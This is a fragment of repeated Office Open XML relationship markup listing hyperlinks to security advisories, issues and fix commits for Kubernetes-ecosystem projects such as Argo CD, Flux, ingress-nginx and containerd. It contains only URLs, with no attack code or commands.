Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126744" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126812" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugzilla.redhat.com/show_bug.cgi?id=1848951" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/issues/6441" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/issues/12309" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/3686" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126811" TargetMode="Externa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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/3686" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/8198&#10;" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/issues/10572" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131005" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131007" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131008" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131006" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126744" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126813" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugzilla.redhat.com/show_bug.cgi?id=1848951" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126812" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/issues/6441" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/issues/12309" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126811"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github.com/kubevirt/kubevirt/pull/3686" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/8198&#10;" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/issues/10572" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131005" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131007" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131008" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131006" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126744" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126813" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugzilla.redhat.com/show_bug.cgi?id=1848951" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126812" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/issues/6441" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/issues/12309" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126811"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s://github.com/kubevirt/kubevirt/pull/8198&#10;" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/issues/10572" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126813" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131005" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131007" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131008" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131006" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126744" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126812" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugzilla.redhat.com/show_bug.cgi?id=1848951" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/issues/6441" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/issues/12309" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/3686" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126811"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github.com/kubevirt/kubevirt/pull/8198&#10;" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/issues/10572" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126813" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131005" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131007" TargetMode="External"/><Relationship Id="rId36" 